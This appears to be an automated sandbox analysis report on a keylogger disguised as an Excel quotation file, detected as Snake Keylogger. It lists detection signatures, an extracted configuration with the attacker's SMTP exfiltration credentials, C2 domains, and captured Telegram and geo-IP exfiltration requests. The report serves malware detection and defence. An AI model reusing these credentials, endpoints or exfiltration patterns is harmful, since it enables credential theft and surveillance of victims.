Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Sample name: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
renamed because original name is a hash value
Original sample name: TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Analysis ID: 1519242
MD5: 2f7386b9d0023122e2499bc02fca0e5a
SHA1: 2d19fbf3aff8726f81ee3cdd27ce338cf36db816
SHA256: a0a21dd376537c79ac0be99488eef94cf21475cd98de2c6cee0094a8fd52cdc0
Tags: exeuser-lowmal3
Infos:

Detection

MassLogger RAT, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49731 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: sZXF.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, OnCgVRIhY.exe.0.dr
Source: Binary string: sZXF.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, OnCgVRIhY.exe.0.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 06C121FFh 0_2_06C126CC
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 0167F8E9h 9_2_0167F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 0167FD41h 9_2_0167FA88
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B97A5Dh 9_2_05B97720
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B98E28h 9_2_05B98B58
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9C866h 9_2_05B9C598
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9E856h 9_2_05B9E588
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B918A1h 9_2_05B915F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B96869h 9_2_05B965C0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B90FF1h 9_2_05B90D48
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B90741h 9_2_05B90498
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then mov esp, ebp 9_2_05B9AC31
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9BF46h 9_2_05B9BC78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9DF36h 9_2_05B9DC68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then mov esp, ebp 9_2_05B9AC40
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B95A29h 9_2_05B95780
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9BAB6h 9_2_05B9B7E8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9DAA6h 9_2_05B9D7D8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9FA96h 9_2_05B9F7C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B92A01h 9_2_05B92758
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9D186h 9_2_05B9CEB8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B92151h 9_2_05B91EA8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9F176h 9_2_05B9EEA8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B95179h 9_2_05B94ED0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9B196h 9_2_05B9AEC8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B948C9h 9_2_05B94620
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B97119h 9_2_05B96E70
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B91449h 9_2_05B911A0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B94471h 9_2_05B941C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9C3D6h 9_2_05B9C108
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9E3C6h 9_2_05B9E0F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B90B99h 9_2_05B908F0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B962DBh 9_2_05B96030
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B932B1h 9_2_05B93008
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B902E9h 9_2_05B90040
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B92E59h 9_2_05B92BB0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B95E81h 9_2_05B95BD8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9F606h 9_2_05B9F338
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B955D1h 9_2_05B95328
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B925A9h 9_2_05B92300
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9B626h 9_2_05B9B358
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9D616h 9_2_05B9D348
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B97571h 9_2_05B972C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9CCF6h 9_2_05B9CA28
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B96CC1h 9_2_05B96A18
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B9ECE6h 9_2_05B9EA18
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B94D21h 9_2_05B94A78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 05B91CF9h 9_2_05B91A50
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 075914BFh 10_2_0759198C
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_014FF4C0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_014FFAF3
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BF2131h 14_2_06BF1E80
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BF26F8h 14_2_06BF22E0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BF021Dh 14_2_06BF0040
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BF0BA7h 14_2_06BF0040
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFE531h 14_2_06BFE288
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFE989h 14_2_06BFE6E0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BF26F8h 14_2_06BF22D6
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFE0D9h 14_2_06BFDE30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BF26F8h 14_2_06BF2626
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFF239h 14_2_06BFEF90
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFF691h 14_2_06BFF3E8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFEDE1h 14_2_06BFEB38
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFCF79h 14_2_06BFCCD0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFC6C9h 14_2_06BFC420
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFCB21h 14_2_06BFC878
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFFAE9h 14_2_06BFF840
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFD829h 14_2_06BFD580
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFDC81h 14_2_06BFD9D8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 4x nop then jmp 06BFD3D1h 14_2_06BFD128

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49746 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49744 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49750 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49740 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49728 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49732 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49718 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49748 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49737 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49742 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49747 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49749 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 188.114.96.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49731 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
